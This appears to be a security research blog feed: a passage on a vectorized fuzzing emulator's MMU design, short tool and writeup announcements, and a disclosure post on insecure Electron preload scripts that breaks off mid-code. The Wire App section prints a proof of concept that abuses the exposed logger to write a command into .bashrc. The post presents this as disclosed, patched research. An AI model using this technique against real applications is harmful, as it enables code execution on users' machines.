Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to the permissions and memory contents. Further in memory the permissions come first followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearally and potentially get a speedup by the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

Simplified to 4 lanes instead of 8 MMU layout

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW it is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This mean it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

When a VM launches it has zero memory in it’s MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

This has the awesome effect of only memory that is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, eg. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your hearts desire.

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.

An example in aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains it’s CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages contain the permissions this automatically handles creating different copies of the same memory with different permissions

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible from bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further the VM may dynamically allocate memory via malloc() which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VM’s that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must have invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.

Are these fast routines really needed?

For example the benchmarks for the Rust implementation for a page table of shape: [16, 16, 16, 13, 3]

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) this number goes down as I can use the old translation longer and I spend less time translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Electronegativity is finally out!

23 January 2019 at 23:00

We’re excited to announce the public release of Electronegativity, an opensource tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remaining blog post will provide more details on the public release and introduce its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, me and Claudio Merloni started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

FridaLab – Writeup

4 February 2019 at 15:20
Today I solved FridaLab, a playground Android application for playing with Frida and testing your skills. The app is made of various challenges, with increasing difficulty, that will guide you through Frida’s potential. This is a writeup with solutions to the challenges in FridaLab. We suggest the reader to take a look at it and try to solve it by itself before reading further. In this writeup we will assume that the reader has a working environment with frida-server already installed on the Android device and frida-tools installed on the PC as well, since we will not cover those topics.

WebTech, identify technologies used on websites

8 March 2019 at 00:37
Introduction We’re very proud to release WebTech as open-source software. WebTech is a Python software that can identify web technologies by visiting a given website, parsing a single response file or replaying a request described in a text file. This way you can have reproducible results and minimize the requests you need to make to a target website. The RECON phase in a Penetration Test is one among the most important ones.

Subverting Electron Apps via Insecure Preload

2 April 2019 at 22:00

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore.

From Alert to Calc

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

  • (1) Preload scripts can reintroduce Node global symbols back to the global scope

    While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)

  • (2) Preload scripts can introduce functionalities that can be abused by untrusted code

    Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives

  • (3) Preload scripts can facilitate sandbox bypasses

    Even with sandbox enabled, preload scripts still have access to Node.JS native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate sandbox bypasses

  • (4) Without contextIsolation, the integrity of preload scripts is not guaranteed

    When isolated words are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, in which a webview HTML tag is used.

Wire App frames

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
    webViewLogger.add(winston.transports.File, {
      filename: logFilePath,
      handleExceptions: true,
    });

    webViewLogger.info(config.NAME, 'Version', config.VERSION);

    // webapp uses global winston reference to define log level
    global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view:

window.document.getElementsByTagName("webview")[0].openDevTools();

Before executing the following code:

function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
        dirname: '/home/ikki/',
        level: 'error',
        filename: '.bashrc',
        json: false,
        formatter: formatme
}))

winston.error('xcalc &');


This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) in use by the same BrowserWindow contains multiple exports including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
}

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper for the official Electron’s asynchronous IPC mechanism in order to exchange messages from the render process (web page) to the main process.

In Electron, ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
